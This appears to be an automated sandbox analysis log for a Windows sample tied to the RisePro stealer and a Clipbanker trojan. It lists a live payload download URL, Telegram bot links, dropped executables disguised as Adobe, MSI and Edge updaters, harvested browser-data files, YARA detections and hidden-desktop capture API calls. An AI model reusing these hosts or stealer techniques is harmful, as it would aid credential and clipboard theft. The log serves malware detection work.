Source: file.exe, 00000000.00000003.2199558318.000000000694F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2195723746.0000000006946000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2196881348.0000000006945000.00000004.00000020.00020000.00000000.sdmp, MSIUpdaterV2.exe, 00000007.00000003.2217734150.000000000286A000.00000004.00000020.00020000.00000000.sdmp, llmcrdwzLnNKYB4T0Vnw.exe, 00000009.00000003.2209721688.0000000002C1B000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, l2[1].exe.0.dr, MSIUpdaterV2.exe.0.dr, oobeldr.exe.9.dr, EdgeMS2.exe.0.dr, llmcrdwzLnNKYB4T0Vnw.exe.0.dr String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: file.exe, 00000000.00000003.2199558318.000000000694F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2195723746.0000000006946000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2196881348.0000000006945000.00000004.00000020.00020000.00000000.sdmp, MSIUpdaterV2.exe, 00000007.00000003.2217734150.000000000286A000.00000004.00000020.00020000.00000000.sdmp, llmcrdwzLnNKYB4T0Vnw.exe, 00000009.00000003.2209721688.0000000002C1B000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, l2[1].exe.0.dr, MSIUpdaterV2.exe.0.dr, oobeldr.exe.9.dr, EdgeMS2.exe.0.dr, llmcrdwzLnNKYB4T0Vnw.exe.0.dr String found in binary or memory: http://ocsp.sectigo.com0
Source: file.exe, 00000000.00000002.4442200408.000000000030D000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: http://www.winimage.com/zLibDll
Source: file.exe, 00000000.00000003.2121507295.0000000006548000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2115771934.0000000006495000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2113965338.0000000006495000.00000004.00000020.00020000.00000000.sdmp, OaQuGlYHO2B0Web Data.0.dr, UdeNZdOQSPDWWeb Data.0.dr, sl01HQPBKH54Web Data.0.dr String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: file.exe, 00000000.00000003.2121507295.0000000006548000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2115771934.0000000006495000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2113965338.0000000006495000.00000004.00000020.00020000.00000000.sdmp, OaQuGlYHO2B0Web Data.0.dr, UdeNZdOQSPDWWeb Data.0.dr, sl01HQPBKH54Web Data.0.dr String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: file.exe, 00000000.00000003.2121507295.0000000006548000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2115771934.0000000006495000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2113965338.0000000006495000.00000004.00000020.00020000.00000000.sdmp, OaQuGlYHO2B0Web Data.0.dr, UdeNZdOQSPDWWeb Data.0.dr, sl01HQPBKH54Web Data.0.dr String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: file.exe, 00000000.00000003.2121507295.0000000006548000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2115771934.0000000006495000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2113965338.0000000006495000.00000004.00000020.00020000.00000000.sdmp, OaQuGlYHO2B0Web Data.0.dr, UdeNZdOQSPDWWeb Data.0.dr, sl01HQPBKH54Web Data.0.dr String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: file.exe, 00000000.00000002.4444160556.0000000001719000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.3698791395.0000000001714000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.3698823077.00000000016D3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4444160556.00000000016D3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://db-ip.com/demo/home.php?s=12.205.151.60
Source: file.exe, 00000000.00000003.3698823077.00000000016D3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4444160556.00000000016D3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://db-ip.com/z-
Source: file.exe, 00000000.00000003.3698823077.00000000016D3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4444160556.00000000016D3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://db-ip.com:443/demo/home.php?s=12.205.151.60
Source: file.exe, 00000000.00000003.2121507295.0000000006548000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2115771934.0000000006495000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2113965338.0000000006495000.00000004.00000020.00020000.00000000.sdmp, OaQuGlYHO2B0Web Data.0.dr, UdeNZdOQSPDWWeb Data.0.dr, sl01HQPBKH54Web Data.0.dr String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: file.exe, 00000000.00000003.2121507295.0000000006548000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2115771934.0000000006495000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2113965338.0000000006495000.00000004.00000020.00020000.00000000.sdmp, OaQuGlYHO2B0Web Data.0.dr, UdeNZdOQSPDWWeb Data.0.dr, sl01HQPBKH54Web Data.0.dr String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: file.exe, 00000000.00000003.2121507295.0000000006548000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2115771934.0000000006495000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2113965338.0000000006495000.00000004.00000020.00020000.00000000.sdmp, OaQuGlYHO2B0Web Data.0.dr, UdeNZdOQSPDWWeb Data.0.dr, sl01HQPBKH54Web Data.0.dr String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: file.exe, 00000000.00000002.4444160556.00000000016C7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.3698823077.00000000016D3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.3698823077.00000000016C7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4444160556.00000000016D3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4443887762.0000000001682000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.3698823077.00000000016B9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4444160556.00000000016B9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ipinfo.io/
Source: file.exe, 00000000.00000002.4444160556.00000000016C7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.3698823077.00000000016C7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ipinfo.io/Mozilla/5.0
Source: file.exe, 00000000.00000002.4442200408.000000000030D000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://ipinfo.io/https://www.maxmind.com/en/locate-my-ip-addressWs2_32.dll
Source: file.exe, 00000000.00000002.4443887762.0000000001682000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ipinfo.io/t
Source: file.exe, 00000000.00000002.4443887762.000000000169D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4444160556.00000000016C7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.3698823077.00000000016C7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ipinfo.io/widget/demo/12.205.151.60
Source: file.exe, 00000000.00000002.4444160556.00000000016C7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.3698823077.00000000016C7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ipinfo.io:443/widget/demo/12.205.151.60
Source: file.exe, 00000000.00000002.4444160556.00000000016C7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.3698823077.00000000016C7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4445474316.0000000006530000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://kuljyftgjk.online/
Source: file.exe, 00000000.00000002.4445474316.0000000006530000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://kuljyftgjk.online/Bb
Source: file.exe, 00000000.00000002.4444160556.00000000016C7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.3698823077.00000000016C7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://kuljyftgjk.online/ons
Source: file.exe, 00000000.00000003.2219971624.000000000647F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://kuljyftgjk.online/server/k/l2.exe
Source: file.exe, 00000000.00000003.2220430384.000000000647F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2220783088.0000000006480000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2219971624.000000000647F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://kuljyftgjk.online/server/k/l2.exe5P#.
Source: file.exe, 00000000.00000003.2220430384.000000000647F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2220783088.0000000006480000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4445088347.0000000006480000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2219971624.000000000647F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://kuljyftgjk.online/server/k/l2.exedwzLnNKYB4T0Vnw.exe
Source: file.exe, 00000000.00000003.2220430384.000000000647F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2220783088.0000000006480000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4445088347.0000000006480000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2219971624.000000000647F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://kuljyftgjk.online/server/k/l2.exeo
Source: file.exe, 00000000.00000003.2220430384.000000000647F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2219971624.000000000647F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://kuljyftgjk.online/server/k/l2.exexefN
Source: file.exe, 00000000.00000003.2219971624.000000000647F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://kuljyftgjk.online:80/
Source: file.exe, 00000000.00000003.2220430384.000000000647F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2220783088.0000000006480000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4445088347.0000000006480000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2219971624.000000000647F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://kuljyftgjk.online:80/I
Source: file.exe, 00000000.00000003.2220430384.000000000647F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2220783088.0000000006480000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4445088347.0000000006480000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2219971624.000000000647F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://kuljyftgjk.online:80/Mi&/
Source: file.exe, 00000000.00000003.2220430384.000000000647F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2220783088.0000000006480000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.3698823077.00000000016D3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4444160556.00000000016D3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2219971624.000000000647F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://kuljyftgjk.online:80/server/k/l2.exe
Source: file.exe, 00000000.00000003.2220430384.000000000647F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2220783088.0000000006480000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4445088347.0000000006480000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2219971624.000000000647F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://kuljyftgjk.online:80/server/k/l2.exe5G
Source: file.exe, 00000000.00000003.2220430384.000000000647F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2220783088.0000000006480000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4445088347.0000000006480000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2219971624.000000000647F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://kuljyftgjk.online:80/server/k/l2.exeJG
Source: file.exe, 00000000.00000003.2220430384.000000000647F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2220783088.0000000006480000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2219971624.000000000647F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://kuljyftgjk.online:80/server/k/l2.exemespace
Source: file.exe, 00000000.00000003.2199558318.000000000694F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2195723746.0000000006946000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2196881348.0000000006945000.00000004.00000020.00020000.00000000.sdmp, MSIUpdaterV2.exe, 00000007.00000003.2217734150.000000000286A000.00000004.00000020.00020000.00000000.sdmp, llmcrdwzLnNKYB4T0Vnw.exe, 00000009.00000003.2209721688.0000000002C1B000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, l2[1].exe.0.dr, MSIUpdaterV2.exe.0.dr, oobeldr.exe.9.dr, EdgeMS2.exe.0.dr, llmcrdwzLnNKYB4T0Vnw.exe.0.dr String found in binary or memory: https://sectigo.com/CPS0
Source: D87fZN3R3jFeplaces.sqlite.0.dr String found in binary or memory: https://support.mozilla.org
Source: D87fZN3R3jFeplaces.sqlite.0.dr String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: D87fZN3R3jFeplaces.sqlite.0.dr String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL
Source: file.exe, 00000000.00000002.4445088347.0000000006449000.00000004.00000020.00020000.00000000.sdmp, dZGGvSkztfgYu5jqSY21Wne.zip.0.dr String found in binary or memory: https://t.me/RiseProSUPPORT
Source: file.exe, 00000000.00000002.4444160556.00000000016D3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142639137.0000000006550000.00000004.00000020.00020000.00000000.sdmp, passwords.txt.0.dr String found in binary or memory: https://t.me/risepro_bot
Source: file.exe, 00000000.00000003.3698823077.00000000016D3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4444160556.00000000016D3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t.me/risepro_bot%(
Source: file.exe, 00000000.00000003.3698823077.00000000016D3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4444160556.00000000016D3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t.me/risepro_botisepro_bot
Source: file.exe, 00000000.00000003.2121507295.0000000006548000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2115771934.0000000006495000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2113965338.0000000006495000.00000004.00000020.00020000.00000000.sdmp, OaQuGlYHO2B0Web Data.0.dr, UdeNZdOQSPDWWeb Data.0.dr, sl01HQPBKH54Web Data.0.dr String found in binary or memory: https://www.ecosia.org/newtab/
Source: file.exe, 00000000.00000003.2121507295.0000000006548000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2115771934.0000000006495000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2113965338.0000000006495000.00000004.00000020.00020000.00000000.sdmp, OaQuGlYHO2B0Web Data.0.dr, UdeNZdOQSPDWWeb Data.0.dr, sl01HQPBKH54Web Data.0.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: D87fZN3R3jFeplaces.sqlite.0.dr String found in binary or memory: https://www.mozilla.org
Source: D87fZN3R3jFeplaces.sqlite.0.dr String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
Source: D87fZN3R3jFeplaces.sqlite.0.dr String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
Source: file.exe, 00000000.00000003.2220430384.000000000647F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2141059621.0000000006550000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.3698823077.00000000016D3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4445474316.0000000006530000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4444160556.00000000016D3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2219971624.000000000647F000.00000004.00000020.00020000.00000000.sdmp, Firefox_v6zchhhv.default-release.txt.0.dr String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: file.exe, 00000000.00000003.2111465574.000000000647D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2127831309.000000000647D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2123105572.000000000647D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2124388373.000000000647D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4445088347.000000000647D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2121830577.000000000647D000.00000004.00000020.00020000.00000000.sdmp, 3b6N2Xdh3CYwplaces.sqlite.0.dr, D87fZN3R3jFeplaces.sqlite.0.dr String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: D87fZN3R3jFeplaces.sqlite.0.dr String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: file.exe, 00000000.00000003.2111465574.000000000647D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2127831309.000000000647D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2123105572.000000000647D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2124388373.000000000647D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4445088347.000000000647D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2121830577.000000000647D000.00000004.00000020.00020000.00000000.sdmp, 3b6N2Xdh3CYwplaces.sqlite.0.dr, D87fZN3R3jFeplaces.sqlite.0.dr String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
Source: file.exe, 00000000.00000003.2220430384.000000000647F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2141059621.0000000006550000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.3698823077.00000000016D3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4445474316.0000000006530000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4444160556.00000000016D3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2219971624.000000000647F000.00000004.00000020.00020000.00000000.sdmp, Firefox_v6zchhhv.default-release.txt.0.dr String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: file.exe, 00000000.00000003.2111465574.000000000647D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2127831309.000000000647D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2123105572.000000000647D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2124388373.000000000647D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4445088347.000000000647D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2121830577.000000000647D000.00000004.00000020.00020000.00000000.sdmp, 3b6N2Xdh3CYwplaces.sqlite.0.dr, D87fZN3R3jFeplaces.sqlite.0.dr String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: file.exe, 00000000.00000002.4445474316.0000000006530000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/txt
Source: unknown Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.75.166:443 -> 192.168.2.5:49706 version: TLS 1.2
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_06D4C230 SetThreadExecutionState,SetThreadExecutionState,CreateThread,CloseHandle,GetDesktopWindow,GetWindowRect,GetSystemMetrics,GetSystemMetrics,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,shutdown,closesocket,SetThreadDesktop,Sleep,GetCurrentThreadId,GetThreadDesktop,SetThreadDesktop,GetCurrentThreadId,GetThreadDesktop,BitBlt,DeleteObject,DeleteDC,ReleaseDC,Sleep,GetSystemMetrics,GetSystemMetrics,GetCurrentThreadId,GetThreadDesktop,SwitchDesktop,SetThreadDesktop,Sleep,Sleep,DeleteObject,DeleteDC,ReleaseDC, 0_2_06D4C230
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_06D29080 OpenDesktopA,CreateDesktopA, 0_2_06D29080

System Summary

Source: 8.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 8.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 7.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 7.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 19.2.EdgeMS2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 19.2.EdgeMS2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 14.2.oobeldr.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 14.2.oobeldr.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 18.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 18.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 17.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 17.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 9.2.llmcrdwzLnNKYB4T0Vnw.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 9.2.llmcrdwzLnNKYB4T0Vnw.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 00000011.00000002.2298062400.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 00000011.00000002.2298062400.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 00000013.00000002.2460266314.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 00000013.00000002.2460266314.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 00000009.00000002.2211800433.0000000000401000.00000020.00000001.01000000.00000008.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 00000009.00000002.2211800433.0000000000401000.00000020.00000001.01000000.00000008.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 00000007.00000002.2220685526.0000000000401000.00000020.00000001.01000000.00000006.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 00000007.00000002.2220685526.0000000000401000.00000020.00000001.01000000.00000006.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 00000008.00000002.2218340799.0000000000401000.00000020.00000001.01000000.00000006.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 00000008.00000002.2218340799.0000000000401000.00000020.00000001.01000000.00000006.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 0000000E.00000002.4441908172.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 0000000E.00000002.4441908172.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 00000012.00000002.2379291934.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 00000012.00000002.2379291934.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: file.exe Static PE information: section name: .vmp#+
Source: file.exe Static PE information: section name: .vmp#+
Source: file.exe Static PE information: section name: .vmp#+
Source: file.exe Static PE information: section name: .vmpY[.
Source: file.exe Static PE information: section name: .vmpY[.
Source: C:\Users\user\Desktop\file.exe Process Stats: CPU usage > 49%
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_06D2C480 CreateProcessAsUserA,CloseHandle,CloseHandle,WaitForSingleObject,GetExitCodeProcess, 0_2_06D2C480
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_06D4D540 0_2_06D4D540
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_06D2A230 0_2_06D2A230
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_06D29A10 0_2_06D29A10
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_06D33B60 0_2_06D33B60
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_06D4C990 0_2_06D4C990
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_06D41980 0_2_06D41980
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_06D6E63B 0_2_06D6E63B
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_06D2C760 0_2_06D2C760
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_06D81714 0_2_06D81714
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_06D324B0 0_2_06D324B0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_06D7F43E 0_2_06D7F43E
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_06D6E2DC 0_2_06D6E2DC
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_06D472F0 0_2_06D472F0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_06D44370 0_2_06D44370
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_06D7C010 0_2_06D7C010
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_06D2FE50 0_2_06D2FE50
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_06D6DF9A 0_2_06D6DF9A
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_06D48F60 0_2_06D48F60
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_06D45AB0 0_2_06D45AB0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_06D30B90 0_2_06D30B90
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_06D67880 0_2_06D67880
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_06D72840 0_2_06D72840
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_06D2F9D0 0_2_06D2F9D0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_06D6E999 0_2_06D6E999
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_06D24910 0_2_06D24910
Source: Joe Sandbox View Dropped File: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe F327C2B5AB1D98F0382A35CD78F694D487C74A7290F1FF7BE53F42E23021E599
